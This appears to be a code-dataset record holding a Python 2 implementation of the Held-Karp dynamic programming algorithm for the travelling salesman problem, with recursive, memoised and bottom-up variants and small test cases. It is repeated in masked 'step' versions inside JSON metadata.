dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
child = [[None for i in xrange(2 ** n)] for j in xrange(n)]
def f(i, visited):
"""
f is defined as in the purely recursive implementation above.
The only difference here is that we check if the value we are
looking for is already in the defined dp table, and we do not
keep track of the path as we go along, as looking up a solution
for any given value would require having stored the path for
that solution as well, which would be expensive.
As such, we use the `child` table to keep track of where we
came from.
"""
if dp[i][visited]:
return dp[i][visited]
if visited == (1 << n) - 1:
dp[i][visited] = d[i][0]
child[i][visited] = 0
return d[i][0]
min_dist = sys.maxint
chosen_j = None
for j in xrange(n):
if not 1 << j & visited:
dist_with_j = d[i][j] + f(j, 1 << j | visited)
if dist_with_j < min_dist:
min_dist = dist_with_j
chosen_j = j
dp[i][visited] = min_dist
child[i][visited] = chosen_j
return min_dist
ans = f(0, 1)
path = [0]
i, visited = 0, 1
next_ = child[i][visited]
while next_ is not None:
path.append(next_)
visited |= 1 << next_
next_ = child[next_][visited]
return ans, path
def held_karp_bottomup(distance_matrix):
"""
In the bottom up implementation, we compute all possible solutions for the
values `i` and `visited` as in the implementations above, and then
simply look up the value for f(0,0).
With this approach, we use the dp table, the original `distance_matrix`
and knowledge of the optimal cost to work backwards in determing what
the optimal path was.
"""
d = distance_matrix
n = len(d)
dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
for i in xrange(n):
dp[i][(1 << n) - 1] = d[i][0]
for visited in reversed(xrange((1 << n) - 1)):
for i in xrange(n):
min_dist = sys.maxint
for j in xrange(n):
if not 1 << j & visited:
dist_j = d[i][j] + dp[j][visited | 1 << j]
if dist_j < min_dist:
min_dist = dist_j
dp[i][visited] = min_dist
ans = dp[0][1]
path = [0]
i, visited = 0, 1
cost_from_i = dp[i][visited]
while visited != (1 << n) - 1:
for j in xrange(n):
if not visited & 1 << j:
cost_from_j = dp[j][visited | 1 << j]
if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:
path.append(j)
i, visited = j, visited | 1 << j
cost_from_i = cost_from_j
break
path.append(0)
return ans, path
class Vertex:
""" Simple implementation of a point in Euclidean space """
def __init__(self, x, y):
self.x = float(x)
self.y = float(y)
def distance(v1, v2):
""" Euclidean distance between two `Vertex` instances """
return ((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2) ** 0.5
def adjacency_matrix(graph):
"""
Construct the corresponding adjacency matrix from a list of verticies in a
graph, assumed to be a complete graph.
"""
m = [[None for v in graph] for v in graph]
for i in xrange(len(m)):
for j in xrange(len(m[i])):
m[i][j] = distance(graph[i], graph[j])
return m
def main():
g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]
m1 = adjacency_matrix(g1)
for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):
cost, path = solver(m1)
assert cost == 16.0
assert path == [0, 2, 1, 3, 0]
g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]
m2 = adjacency_matrix(g2)
for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):
cost, path = solver(m2)
assert abs(cost - 15.7733871) < 0.001
assert path == [0, 3, 1, 2, 4, 0]
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
'''
held-karp.py
Implementation of the Bellman-Held-Karp Algorithm to exactly solve TSPs,
requiring no external dependencies.
Includes a purely recursive implementation, as well as both top-down and
bottom-up dynamic programming approaches.
'''
import sys
def held_karp_recursive(distance_matrix):
'''
Solution to TSP using the Bellman-Held-Karp Algorithm
Given the adjacency matrix to a corresponding tsp problem, find the
minimum cost Hamiltonian cycle through the graph, as well as the
corresponding path
'''
d = distance_matrix
n = len(d)
def f(i, visited, path_so_far):
'''
Let f(i, visited, path_so_far) be the path of minimum distance from
city i to city 0, that passes through all remaining unvisited cities in
`visited`, where visited is a bitmask such that the bit in the jth
position being 1 represents city j having been visited, and bit j
being 0 represents city j having not been visited, and `path_so_far` is
the current path of minimum distance from city 0 up to city i.
Then the solution we want is f(0, 0, []), and the following recursive
relation holds:
f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )
NOTE: Must be careful not to mutate
'''
# Base case: check if all cities have been visited
if visited == (1 << n) - 1:
# we have visited all cities, return to 0
return d[i][0], path_so_far + [0,]
min_dist = sys.maxint
# visit all unvisited cities
for j in xrange(n):
if not (1 << j) & visited:
dist_from_j, path_with_j = \
f(j, visited | (1 << j), path_so_far + [j,])
# Distance with j
dist_with_j = d[i][j] + dist_from_j
if dist_with_j < min_dist:
min_dist = dist_with_j
min_path = path_with_j
return min_dist, min_path
return f(0, 0, [])
def held_karp_topdown(distance_matrix):
'''
Above algorithm, but making use of memoization to avoid recomputing
overlapping subproblems
'''
d = distance_matrix
n = len(d)
'''
We need a dp table that will store the minimum distances from city i
to city 0 that passes through all unvisitied cities in the bit mask.
There are n cities, and 2^n possible binary strings of length n, so our
table will have dimensions n x 2^n
With this approach, we use another table called 'child' that keeps track
of the child city of i for each combination of (i, visited), and we can
use this table to obtain the actual Hamiltonian cycle of minimum distance.
'''
dp = [[None for i in xrange(2**n)] for j in xrange(n)]
child = [[None for i in xrange(2**n)] for j in xrange(n)]
def f(i, visited):
'''
f is defined as in the purely recursive implementation above.
The only difference here is that we check if the value we are
looking for is already in the defined dp table, and we do not
keep track of the path as we go along, as looking up a solution
for any given value would require having stored the path for
that solution as well, which would be expensive.
As such, we use the `child` table to keep track of where we
came from.
'''
# Check the table
if dp[i][visited]:
return dp[i][visited]
# Base case: check if all cities have been visited
if visited == (1 << n) - 1:
# we have visited all cities, return to 0
dp[i][visited] = d[i][0]
child[i][visited] = 0
return d[i][0]
min_dist = sys.maxint
chosen_j = None
# visit all unvisited cities
for j in xrange(n):
if not (1 << j) & visited:
dist_with_j = d[i][j] + f(j, (1 << j) | visited)
if dist_with_j < min_dist:
min_dist = dist_with_j
chosen_j = j
dp[i][visited] = min_dist
child[i][visited] = chosen_j
return min_dist
# The value we are interested in
ans = f(0,1)
# Can optain the optimal path using the parent matrix
path = [0]
i, visited = 0, 1
next_ = child[i][visited]
while next_ is not None:
path.append(next_)
visited |= (1 << next_)
next_ = child[next_][visited]
return ans, path
def held_karp_bottomup(distance_matrix):
'''
In the bottom up implementation, we compute all possible solutions for the
values `i` and `visited` as in the implementations above, and then
simply look up the value for f(0,0).
With this approach, we use the dp table, the original `distance_matrix`
and knowledge of the optimal cost to work backwards in determing what
the optimal path was.
'''
d = distance_matrix
n = len(d)
dp = [[None for i in xrange(2**n)] for j in xrange(n)]
# Base case:
# Distance from any city i back to 0 after having visited all cities
for i in xrange(n):
dp[i][(1<<n)-1] = d[i][0]
# Fill in all values of the dp table, excluding the values from the
# base case we've already inserted
# Note we started with having visited all cities except for 0
# and work backwards from there
for visited in reversed(xrange((1<<n)-1)):
for i in xrange(n):
min_dist = sys.maxint
for j in xrange(n):
if not (1 << j) & visited:
dist_j = d[i][j] + dp[j][visited | (1 << j)]
if dist_j < min_dist:
min_dist = dist_j
dp[i][visited] = min_dist
ans = dp[0][1]
# We can also optain the optimal path working backwards using
# the table and the knowledge of the cost of the optimal path
path = [0]
i, visited = 0, 1
cost_from_i = dp[i][visited]
while visited != (1 << n)-1:
for j in xrange(n):
if not visited & (1 << j):
cost_from_j = dp[j][visited | (1 << j)]
# require a tolerance for real valued distances
if abs((cost_from_i - cost_from_j) - d[i][j]) < 0.001:
# j was the city selected in the opt solution
path.append(j)
i, visited = j, visited | (1 << j)
cost_from_i = cost_from_j
break
# We have visited all cities, so return to 0
path.append(0)
return ans, path
class Vertex:
''' Simple implementation of a point in Euclidean space '''
def __init__(self, x, y):
self.x = float(x)
self.y = float(y)
def distance(v1, v2):
''' Euclidean distance between two `Vertex` instances '''
return ((v1.x - v2.x)**2 + (v1.y - v2.y)**2)**0.5
def adjacency_matrix(graph):
'''
Construct the corresponding adjacency matrix from a list of verticies in a
graph, assumed to be a complete graph.
'''
m = [[None for v in graph] for v in graph]
for i in xrange(len(m)):
for j in xrange(len(m[i])):
m[i][j] = distance(graph[i], graph[j])
return m
def main():
## Test cases
# g1: (16.0, [0, 2, 1, 3, 0])
g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]
m1 = adjacency_matrix(g1)
for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:
cost, path = solver(m1)
assert cost == 16.0
assert path == [0, 2, 1, 3, 0]
# g2: (15.773387165490545, [0, 3, 1, 2, 4, 0])
g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]
m2 = adjacency_matrix(g2)
for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:
cost, path = solver(m2)
assert abs(cost - 15.7733871) < 0.001
assert path == [0, 3, 1, 2, 4, 0]
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "3e8fa71c4e23348c6f00fe97729b5717bb6245a1",
"index": 8070,
"step-1": "<mask token>\n\n\ndef held_karp_bottomup(distance_matrix):\n \"\"\"\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n \"\"\"\n d = distance_matrix\n n = len(d)\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n for i in xrange(n):\n dp[i][(1 << n) - 1] = d[i][0]\n for visited in reversed(xrange((1 << n) - 1)):\n for i in xrange(n):\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_j = d[i][j] + dp[j][visited | 1 << j]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n ans = dp[0][1]\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n) - 1:\n for j in xrange(n):\n if not visited & 1 << j:\n cost_from_j = dp[j][visited | 1 << j]\n if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:\n path.append(j)\n i, visited = j, visited | 1 << j\n cost_from_i = cost_from_j\n break\n path.append(0)\n return ans, path\n\n\nclass Vertex:\n \"\"\" Simple implementation of a point in Euclidean space \"\"\"\n\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\n<mask token>\n\n\ndef adjacency_matrix(graph):\n \"\"\"\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n \"\"\"\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef held_karp_recursive(distance_matrix):\n \"\"\"\n Solution to TSP using the Bellman-Held-Karp Algorithm\n\n Given the adjacency matrix to a corresponding tsp problem, find the\n minimum cost Hamiltonian cycle through the graph, as well as the\n corresponding path\n \"\"\"\n d = distance_matrix\n n = len(d)\n\n def f(i, visited, path_so_far):\n \"\"\"\n Let f(i, visited, path_so_far) be the path of minimum distance from\n city i to city 0, that passes through all remaining unvisited cities in\n `visited`, where visited is a bitmask such that the bit in the jth\n position being 1 represents city j having been visited, and bit j\n being 0 represents city j having not been visited, and `path_so_far` is\n the current path of minimum distance from city 0 up to city i.\n\n Then the solution we want is f(0, 0, []), and the following recursive\n relation holds:\n\n f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )\n\n NOTE: Must be careful not to mutate\n \"\"\"\n if visited == (1 << n) - 1:\n return d[i][0], path_so_far + [0]\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_from_j, path_with_j = f(j, visited | 1 << j, \n path_so_far + [j])\n dist_with_j = d[i][j] + dist_from_j\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n min_path = path_with_j\n return min_dist, min_path\n return f(0, 0, [])\n\n\ndef held_karp_topdown(distance_matrix):\n \"\"\"\n Above algorithm, but making use of memoization to avoid recomputing\n overlapping subproblems\n \"\"\"\n d = distance_matrix\n n = len(d)\n \"\"\"\n We need a dp table that will store the minimum distances from city i\n to city 0 that passes through all unvisitied cities in the bit mask.\n There are n cities, and 2^n possible binary strings of length n, so our\n table will have dimensions n x 2^n\n\n With this approach, we use another table called 'child' that keeps track\n of the child city of i for each combination of (i, visited), and we can\n use this table to obtain the actual Hamiltonian cycle of minimum distance.\n \"\"\"\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n child = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n\n def f(i, visited):\n \"\"\"\n f is defined as in the purely recursive implementation above.\n The only difference here is that we check if the value we are\n looking for is already in the defined dp table, and we do not\n keep track of the path as we go along, as looking up a solution\n for any given value would require having stored the path for\n that solution as well, which would be expensive.\n\n As such, we use the `child` table to keep track of where we\n came from.\n \"\"\"\n if dp[i][visited]:\n return dp[i][visited]\n if visited == (1 << n) - 1:\n dp[i][visited] = d[i][0]\n child[i][visited] = 0\n return d[i][0]\n min_dist = sys.maxint\n chosen_j = None\n for j in xrange(n):\n if not 1 << j & visited:\n dist_with_j = d[i][j] + f(j, 1 << j | visited)\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n chosen_j = j\n dp[i][visited] = min_dist\n child[i][visited] = chosen_j\n return min_dist\n ans = f(0, 1)\n path = [0]\n i, visited = 0, 1\n next_ = child[i][visited]\n while next_ is not None:\n path.append(next_)\n visited |= 1 << next_\n next_ = child[next_][visited]\n return ans, path\n\n\ndef held_karp_bottomup(distance_matrix):\n \"\"\"\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n \"\"\"\n d = distance_matrix\n n = len(d)\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n for i in xrange(n):\n dp[i][(1 << n) - 1] = d[i][0]\n for visited in reversed(xrange((1 << n) - 1)):\n for i in xrange(n):\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_j = d[i][j] + dp[j][visited | 1 << j]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n ans = dp[0][1]\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n) - 1:\n for j in xrange(n):\n if not visited & 1 << j:\n cost_from_j = dp[j][visited | 1 << j]\n if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:\n path.append(j)\n i, visited = j, visited | 1 << j\n cost_from_i = cost_from_j\n break\n path.append(0)\n return ans, path\n\n\nclass Vertex:\n \"\"\" Simple implementation of a point in Euclidean space \"\"\"\n\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\ndef distance(v1, v2):\n \"\"\" Euclidean distance between two `Vertex` instances \"\"\"\n return ((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2) ** 0.5\n\n\ndef adjacency_matrix(graph):\n \"\"\"\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n \"\"\"\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef held_karp_recursive(distance_matrix):\n \"\"\"\n Solution to TSP using the Bellman-Held-Karp Algorithm\n\n Given the adjacency matrix to a corresponding tsp problem, find the\n minimum cost Hamiltonian cycle through the graph, as well as the\n corresponding path\n \"\"\"\n d = distance_matrix\n n = len(d)\n\n def f(i, visited, path_so_far):\n \"\"\"\n Let f(i, visited, path_so_far) be the path of minimum distance from\n city i to city 0, that passes through all remaining unvisited cities in\n `visited`, where visited is a bitmask such that the bit in the jth\n position being 1 represents city j having been visited, and bit j\n being 0 represents city j having not been visited, and `path_so_far` is\n the current path of minimum distance from city 0 up to city i.\n\n Then the solution we want is f(0, 0, []), and the following recursive\n relation holds:\n\n f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )\n\n NOTE: Must be careful not to mutate\n \"\"\"\n if visited == (1 << n) - 1:\n return d[i][0], path_so_far + [0]\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_from_j, path_with_j = f(j, visited | 1 << j, \n path_so_far + [j])\n dist_with_j = d[i][j] + dist_from_j\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n min_path = path_with_j\n return min_dist, min_path\n return f(0, 0, [])\n\n\ndef held_karp_topdown(distance_matrix):\n \"\"\"\n Above algorithm, but making use of memoization to avoid recomputing\n overlapping subproblems\n \"\"\"\n d = distance_matrix\n n = len(d)\n \"\"\"\n We need a dp table that will store the minimum distances from city i\n to city 0 that passes through all unvisitied cities in the bit mask.\n There are n cities, and 2^n possible binary strings of length n, so our\n table will have dimensions n x 2^n\n\n With this approach, we use another table called 'child' that keeps track\n of the child city of i for each combination of (i, visited), and we can\n use this table to obtain the actual Hamiltonian cycle of minimum distance.\n \"\"\"\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n child = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n\n def f(i, visited):\n \"\"\"\n f is defined as in the purely recursive implementation above.\n The only difference here is that we check if the value we are\n looking for is already in the defined dp table, and we do not\n keep track of the path as we go along, as looking up a solution\n for any given value would require having stored the path for\n that solution as well, which would be expensive.\n\n As such, we use the `child` table to keep track of where we\n came from.\n \"\"\"\n if dp[i][visited]:\n return dp[i][visited]\n if visited == (1 << n) - 1:\n dp[i][visited] = d[i][0]\n child[i][visited] = 0\n return d[i][0]\n min_dist = sys.maxint\n chosen_j = None\n for j in xrange(n):\n if not 1 << j & visited:\n dist_with_j = d[i][j] + f(j, 1 << j | visited)\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n chosen_j = j\n dp[i][visited] = min_dist\n child[i][visited] = chosen_j\n return min_dist\n ans = f(0, 1)\n path = [0]\n i, visited = 0, 1\n next_ = child[i][visited]\n while next_ is not None:\n path.append(next_)\n visited |= 1 << next_\n next_ = child[next_][visited]\n return ans, path\n\n\ndef held_karp_bottomup(distance_matrix):\n \"\"\"\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n \"\"\"\n d = distance_matrix\n n = len(d)\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n for i in xrange(n):\n dp[i][(1 << n) - 1] = d[i][0]\n for visited in reversed(xrange((1 << n) - 1)):\n for i in xrange(n):\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_j = d[i][j] + dp[j][visited | 1 << j]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n ans = dp[0][1]\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n) - 1:\n for j in xrange(n):\n if not visited & 1 << j:\n cost_from_j = dp[j][visited | 1 << j]\n if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:\n path.append(j)\n i, visited = j, visited | 1 << j\n cost_from_i = cost_from_j\n break\n path.append(0)\n return ans, path\n\n\nclass Vertex:\n \"\"\" Simple implementation of a point in Euclidean space \"\"\"\n\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\ndef distance(v1, v2):\n \"\"\" Euclidean distance between two `Vertex` instances \"\"\"\n return ((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2) ** 0.5\n\n\ndef adjacency_matrix(graph):\n \"\"\"\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n \"\"\"\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\ndef main():\n g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]\n m1 = adjacency_matrix(g1)\n for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):\n cost, path = solver(m1)\n assert cost == 16.0\n assert path == [0, 2, 1, 3, 0]\n g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]\n m2 = adjacency_matrix(g2)\n for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):\n cost, path = solver(m2)\n assert abs(cost - 15.7733871) < 0.001\n assert path == [0, 3, 1, 2, 4, 0]\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef held_karp_recursive(distance_matrix):\n \"\"\"\n Solution to TSP using the Bellman-Held-Karp Algorithm\n\n Given the adjacency matrix to a corresponding tsp problem, find the\n minimum cost Hamiltonian cycle through the graph, as well as the\n corresponding path\n \"\"\"\n d = distance_matrix\n n = len(d)\n\n def f(i, visited, path_so_far):\n \"\"\"\n Let f(i, visited, path_so_far) be the path of minimum distance from\n city i to city 0, that passes through all remaining unvisited cities in\n `visited`, where visited is a bitmask such that the bit in the jth\n position being 1 represents city j having been visited, and bit j\n being 0 represents city j having not been visited, and `path_so_far` is\n the current path of minimum distance from city 0 up to city i.\n\n Then the solution we want is f(0, 0, []), and the following recursive\n relation holds:\n\n f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )\n\n NOTE: Must be careful not to mutate\n \"\"\"\n if visited == (1 << n) - 1:\n return d[i][0], path_so_far + [0]\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_from_j, path_with_j = f(j, visited | 1 << j, \n path_so_far + [j])\n dist_with_j = d[i][j] + dist_from_j\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n min_path = path_with_j\n return min_dist, min_path\n return f(0, 0, [])\n\n\ndef held_karp_topdown(distance_matrix):\n \"\"\"\n Above algorithm, but making use of memoization to avoid recomputing\n overlapping subproblems\n \"\"\"\n d = distance_matrix\n n = len(d)\n \"\"\"\n We need a dp table that will store the minimum distances from city i\n to city 0 that passes through all unvisitied cities in the bit mask.\n There are n cities, and 2^n possible binary strings of length n, so our\n table will have dimensions n x 2^n\n\n With this approach, we use another table called 'child' that keeps track\n of the child city of i for each combination of (i, visited), and we can\n use this table to obtain the actual Hamiltonian cycle of minimum distance.\n \"\"\"\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n child = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n\n def f(i, visited):\n \"\"\"\n f is defined as in the purely recursive implementation above.\n The only difference here is that we check if the value we are\n looking for is already in the defined dp table, and we do not\n keep track of the path as we go along, as looking up a solution\n for any given value would require having stored the path for\n that solution as well, which would be expensive.\n\n As such, we use the `child` table to keep track of where we\n came from.\n \"\"\"\n if dp[i][visited]:\n return dp[i][visited]\n if visited == (1 << n) - 1:\n dp[i][visited] = d[i][0]\n child[i][visited] = 0\n return d[i][0]\n min_dist = sys.maxint\n chosen_j = None\n for j in xrange(n):\n if not 1 << j & visited:\n dist_with_j = d[i][j] + f(j, 1 << j | visited)\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n chosen_j = j\n dp[i][visited] = min_dist\n child[i][visited] = chosen_j\n return min_dist\n ans = f(0, 1)\n path = [0]\n i, visited = 0, 1\n next_ = child[i][visited]\n while next_ is not None:\n path.append(next_)\n visited |= 1 << next_\n next_ = child[next_][visited]\n return ans, path\n\n\ndef held_karp_bottomup(distance_matrix):\n \"\"\"\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n \"\"\"\n d = distance_matrix\n n = len(d)\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n for i in xrange(n):\n dp[i][(1 << n) - 1] = d[i][0]\n for visited in reversed(xrange((1 << n) - 1)):\n for i in xrange(n):\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_j = d[i][j] + dp[j][visited | 1 << j]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n ans = dp[0][1]\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n) - 1:\n for j in xrange(n):\n if not visited & 1 << j:\n cost_from_j = dp[j][visited | 1 << j]\n if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:\n path.append(j)\n i, visited = j, visited | 1 << j\n cost_from_i = cost_from_j\n break\n path.append(0)\n return ans, path\n\n\nclass Vertex:\n \"\"\" Simple implementation of a point in Euclidean space \"\"\"\n\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\ndef distance(v1, v2):\n \"\"\" Euclidean distance between two `Vertex` instances \"\"\"\n return ((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2) ** 0.5\n\n\ndef adjacency_matrix(graph):\n \"\"\"\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n \"\"\"\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\ndef main():\n g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]\n m1 = adjacency_matrix(g1)\n for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):\n cost, path = solver(m1)\n assert cost == 16.0\n assert path == [0, 2, 1, 3, 0]\n g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]\n m2 = adjacency_matrix(g2)\n for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):\n cost, path = solver(m2)\n assert abs(cost - 15.7733871) < 0.001\n assert path == [0, 3, 1, 2, 4, 0]\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "'''\nheld-karp.py\n\nImplementation of the Bellman-Held-Karp Algorithm to exactly solve TSPs,\nrequiring no external dependencies.\n\nIncludes a purely recursive implementation, as well as both top-down and\nbottom-up dynamic programming approaches.\n'''\nimport sys\n\n\ndef held_karp_recursive(distance_matrix):\n '''\n Solution to TSP using the Bellman-Held-Karp Algorithm\n\n Given the adjacency matrix to a corresponding tsp problem, find the\n minimum cost Hamiltonian cycle through the graph, as well as the\n corresponding path\n '''\n d = distance_matrix\n n = len(d)\n\n def f(i, visited, path_so_far):\n '''\n Let f(i, visited, path_so_far) be the path of minimum distance from\n city i to city 0, that passes through all remaining unvisited cities in\n `visited`, where visited is a bitmask such that the bit in the jth\n position being 1 represents city j having been visited, and bit j\n being 0 represents city j having not been visited, and `path_so_far` is\n the current path of minimum distance from city 0 up to city i.\n\n Then the solution we want is f(0, 0, []), and the following recursive\n relation holds:\n\n f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )\n\n NOTE: Must be careful not to mutate\n '''\n # Base case: check if all cities have been visited\n if visited == (1 << n) - 1:\n # we have visited all cities, return to 0\n return d[i][0], path_so_far + [0,]\n\n min_dist = sys.maxint\n # visit all unvisited cities\n for j in xrange(n):\n if not (1 << j) & visited:\n dist_from_j, path_with_j = \\\n f(j, visited | (1 << j), path_so_far + [j,])\n # Distance with j\n dist_with_j = d[i][j] + dist_from_j\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n min_path = path_with_j\n\n return min_dist, min_path\n\n return f(0, 0, [])\n\n\ndef held_karp_topdown(distance_matrix):\n '''\n Above algorithm, but making use of memoization to avoid recomputing\n overlapping subproblems\n '''\n d = distance_matrix\n n = len(d)\n\n '''\n We need a dp table that will store the minimum distances from city i\n to city 0 that passes through all unvisitied cities in the bit mask.\n There are n cities, and 2^n possible binary strings of length n, so our\n table will have dimensions n x 2^n\n\n With this approach, we use another table called 'child' that keeps track\n of the child city of i for each combination of (i, visited), and we can\n use this table to obtain the actual Hamiltonian cycle of minimum distance.\n '''\n dp = [[None for i in xrange(2**n)] for j in xrange(n)]\n child = [[None for i in xrange(2**n)] for j in xrange(n)]\n\n def f(i, visited):\n '''\n f is defined as in the purely recursive implementation above.\n The only difference here is that we check if the value we are\n looking for is already in the defined dp table, and we do not\n keep track of the path as we go along, as looking up a solution\n for any given value would require having stored the path for\n that solution as well, which would be expensive.\n\n As such, we use the `child` table to keep track of where we\n came from.\n '''\n # Check the table\n if dp[i][visited]:\n return dp[i][visited]\n # Base case: check if all cities have been visited\n if visited == (1 << n) - 1:\n # we have visited all cities, return to 0\n dp[i][visited] = d[i][0]\n child[i][visited] = 0\n return d[i][0]\n\n min_dist = sys.maxint\n chosen_j = None\n # visit all unvisited cities\n for j in xrange(n):\n if not (1 << j) & visited:\n dist_with_j = d[i][j] + f(j, (1 << j) | visited)\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n chosen_j = j\n\n dp[i][visited] = min_dist\n child[i][visited] = chosen_j\n return min_dist\n\n # The value we are interested in\n ans = f(0,1)\n\n # Can optain the optimal path using the parent matrix\n path = [0]\n i, visited = 0, 1\n next_ = child[i][visited]\n while next_ is not None:\n path.append(next_)\n visited |= (1 << next_)\n next_ = child[next_][visited]\n\n return ans, path\n\n\ndef held_karp_bottomup(distance_matrix):\n '''\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n '''\n d = distance_matrix\n n = len(d)\n\n dp = [[None for i in xrange(2**n)] for j in xrange(n)]\n\n # Base case:\n # Distance from any city i back to 0 after having visited all cities\n for i in xrange(n):\n 